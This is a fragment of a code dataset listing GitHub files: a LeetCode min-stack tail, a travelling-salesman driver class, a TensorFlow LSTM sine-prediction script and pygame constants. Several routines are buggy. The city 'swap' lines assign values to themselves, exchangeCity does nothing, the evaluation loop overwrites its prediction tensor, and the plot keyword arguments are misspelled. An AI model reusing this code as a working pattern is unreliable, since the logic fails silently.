v:\n return rix\n return ix\n \n def tryGetHeapValue(self, ix):\n if ix >= len(self.heap):\n return None\n return self.heap[ix]\n\n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self.stack[len(self.stack) - 1]\n \n def getMin(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self.heap[0]\n \n def exchangeHeap(self, i, j):\n self.exchange(self.heapToStack, i, j)\n self.exchange(self.heap, i, j)\n self.exchange(self.stackToHeap, self.heapToStack[i], self.heapToStack[j])\n \n def exchange(self, a, i, j):\n t = a[i]\n a[i] = a[j]\n a[j] = t\n \n def getParentIndex(self, i):\n if i == 0:\n return 0\n return (i - 1) / 2","repo_name":"igorsubbotin/leetcode_python","sub_path":"problem_155.py","file_name":"problem_155.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21422991353","text":"import random\n\nfrom Map.CountryMap import City\nfrom main import calculateDistance\n\n\nclass Driver:\n listOfCities = []\n distArray = []\n\n def __init__(self, name, listOfCities):\n self.name = name\n self.listOfCities = listOfCities\n\n def calculateRouteDistance(self):\n distance = 0\n for x in range (len(self.listOfCities)-1):\n cityOrigin = self.listOfCities[x]\n cityDestination = self.listOfCities[x+1]\n twoPointDist = calculateDistance(cityOrigin.xPos, cityOrigin.yPos, cityDestination.xPos, cityDestination.yPos)\n distance += twoPointDist\n #print(\"Dist:\" + str(twoPointDist) + \" ; Point A: \" + str(cityOrigin.xPos) + \",\" + str(cityOrigin.yPos) +\n # \" ; Point b: \" + str(cityDestination.xPos) + \",\" + str(cityDestination.yPos))\n #print(\"Current sum of distances: \" + str(distance))\n\n return distance\n\n def listDriverCities(self):\n print(\"Listing cities\")\n for x in range(len(self.listOfCities)):\n print(self.name + \", City.\" + str(x) + \": \" + str(self.listOfCities[x].xPos) + \" \" + str(self.listOfCities[x].yPos))\n\n # swaps order of two consecutive cities based on randomly generated number\n def changeOrderOfTwoConsecutiveCities(self):\n listLength = len(self.listOfCities)\n swapIndex1 = 1\n if listLength > 4:\n swapIndex1 = random.randint(1, listLength-3) # first and last city must be Base City\n elif listLength == 4:\n swapIndex1 = 1 # first and last city must be Base City\n swapIndex2 = swapIndex1+1\n self.listOfCities[swapIndex1], self.listOfCities[swapIndex2] = self.listOfCities[swapIndex1], self.listOfCities[swapIndex2]\n\n\n def changeOrderOfTwoRandomCities(self):\n listLength = len(self.listOfCities)\n swapIndex1 = random.randint(1, listLength-2) # first and last city must be Base City\n swapIndex2 = random.randint(1, listLength-2)\n # case when its BASE CITY xNumbOfCities BASE\n if listLength > 3:\n while swapIndex1 == swapIndex2:\n swapIndex2 = random.randint(1, listLength-2)\n self.listOfCities[swapIndex1], self.listOfCities[swapIndex2] = self.listOfCities[swapIndex1], self.listOfCities[swapIndex2]\n\n\n def exchangeCity(self, city):\n index = random.randint(1, len(self.listOfCities))\n self.listOfCities[index]","repo_name":"Aygor113/TravellingSalesman","sub_path":"Driver/Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23850259113","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib as mpl\n\n#运行不显示图\nmpl.use('Agg')\nfrom matplotlib import pyplot as plt\n\n#隐藏层节点个数\nHIDDEN_SIZE=30\n#Lstm层数\nNUM_LAYERS=2\n#循环神经网路的训练序列长度\nTIMESTEPS=10\n#训练轮数\nTRAING_STEPS=10000\nBATCH_SIZE=32\n\n#训练数据个数\nTRAING_EXAMPLES=10000\n#测试数据个数\nTESTING_EXAMPLES=1000\n#采样间隔\nSAMPLE_GAP=0.01\n\ndef generate_data(seq):\n x=[]\n y=[]\n\n #序列的第i项和后面的TIMESTEPS-1项作为输入,\n for i in range(len(seq)-TIMESTEPS):\n x.append([seq[i:i+TIMESTEPS]])\n y.append([seq[i+TIMESTEPS]])\n return np.array(x,dtype=np.float32),np.array(y,dtype=np.float32)\n\n\ndef lstm_model(x,y,is_training):\n #使用多层的LSTM结构\n cell=tf.nn.rnn_cell.MultiRNNCell(\n [tf.nn.rnn_cell.BasicLSTMCell(HIDDEN_SIZE) for _ in range(NUM_LAYERS)]\n )\n\n\n #使用TensorFlow 接口将多层的LSTM结构链接成RNN网络并计算前向传播结果\n #outputs 是顶层Lstm 在每一步的输出结果,纬度是[batch_size,time,HIDDEN_SIZE],本问题中只关注最后一个时刻的输出结果\n outputs,_=tf.nn.dynamic_rnn(cell,x,dtype=tf.float32)\n output=outputs[:,-1,:]\n\n #对lstm网络的输出加已成全联接并计算损失\n predictions=tf.contrib.layers.fully_connected(output,1,activation_fn=None)\n\n #只在训练时计算损失函数和优化步骤,测试时直接返回预测结果\n if not is_training:\n return predictions,None,None\n\n loss=tf.losses.mean_squared_error(labels=y,predictions=predictions)\n\n #创建模型优化器并得到优化步骤\n train_op=tf.contrib.layers.optimize_loss(\n loss,tf.train.get_global_step(),\n optimizer='Adagrad',learning_rate=0.1\n )\n\n return predictions,loss,train_op\n\n\ndef train(sess,train_x,train_y):\n #将训练数据以数据集的方式提供给计算图\n ds=tf.data.Dataset.from_tensor_slices((train_x,train_y))\n ds=ds.repeat().shuffle(1000).batch(BATCH_SIZE)\n\n x,y=ds.make_one_shot_iterator().get_next()\n\n #调用模型,得到预测结果,损失函数,和训练操作\n with tf.variable_scope('model'):\n predictions,loss,train_op=lstm_model(x,y,True)\n\n #初始化变量\n sess.run(tf.global_variables_initializer())\n for i in range(TRAING_STEPS):\n _,l=sess.run([train_op,loss])\n if(i%1000==0):\n print(\"train step:\"+str(i)+\",loss:\"+str(l))\n\n#评估\ndef run_eval(sess,test_x,test_y):\n ds = tf.data.Dataset.from_tensor_slices((test_x, test_y))\n ds = ds.batch(1)\n\n x,y=ds.make_one_shot_iterator().get_next()\n\n\n #调用模型得到计算结果,不需要输入真实的y值\n with tf.variable_scope('model',reuse=True):\n prediction,_,_=lstm_model(x,[0.0],False)\n\n\n #将预测结果存入一个数组\n predictions=[]\n lables=[]\n for i in range(TESTING_EXAMPLES):\n p,l=sess.run([predictions,y])\n predictions.append(p)\n lables.append(l)\n\n #计算rmse作为评价指标\n #squeeze去除纬度为1的shape\n predictions=np.array(predictions).squeeze()\n lables=np.array(lables).squeeze()\n rmse=np.sqrt((predictions-lables)**2).mean(axis=0)\n print(\"MEAN SQUARE ERROR is:%f\" %rmse)\n\n #对预测的sin函数作绘图\n plt.figure()\n plt.plot(predictions,labe='predictions')\n plt.plot(lables,lable='real_sin')\n plt.legend()\n plt.show()\n\n#使用正弦函数生成训练集和测试集\ntest_start=(TRAING_EXAMPLES+TIMESTEPS)*SAMPLE_GAP\ntest_end=test_start+(TESTING_EXAMPLES+TIMESTEPS)*SAMPLE_GAP\n\ntrain_x,train_y=generate_data(np.sin(np.linspace(0,test_start,TRAING_EXAMPLES+TIMESTEPS,dtype=np.float32)))\ntest_x,test_y=generate_data(np.sin(np.linspace(test_start,test_end,TESTING_EXAMPLES+TIMESTEPS,dtype=np.float32)))\n\nwith tf.Session() as sess:\n train(sess,train_x,train_y)\n run_eval(sess,test_x,test_y)\n\n\n\n\n\n\n","repo_name":"computer-jz/Tensorflow.1.14.0","sub_path":"8 循环神经网络/8.4 例子.py","file_name":"8.4 例子.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25997965879","text":"import pygame\n\n# Initialization required to import TILESIZE\npygame.init()\n\nSCREEN_SCALE = 25 # The higher, the broader the camera\nTILESIZE = pygame.display.list_modes()[0][0] // SCREEN_SCALE\nPROJECTILE_SIZE = TILESIZE * (40/100)\nMAP_H = TILESIZE * 40\nMAP_W = TILESIZE * 40\n\nCOLORS = {\n \"BLACK\": (0, 0, 0),\n \"WHITE\": (255, 255, 255),\n \"BLUE\": (0, 0, 255),\n \"GREY\": (100, 100, 100),\n \"RED\": (200, 20, 20),\n \"GREEN\": (20, 200, 20),\n}\n\nFPS = 60\nSPEED = 0.3\nENEMY_SPEED = 0.1\n","repo_name":"pypaut/santarena","sub_path":"python/lib/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}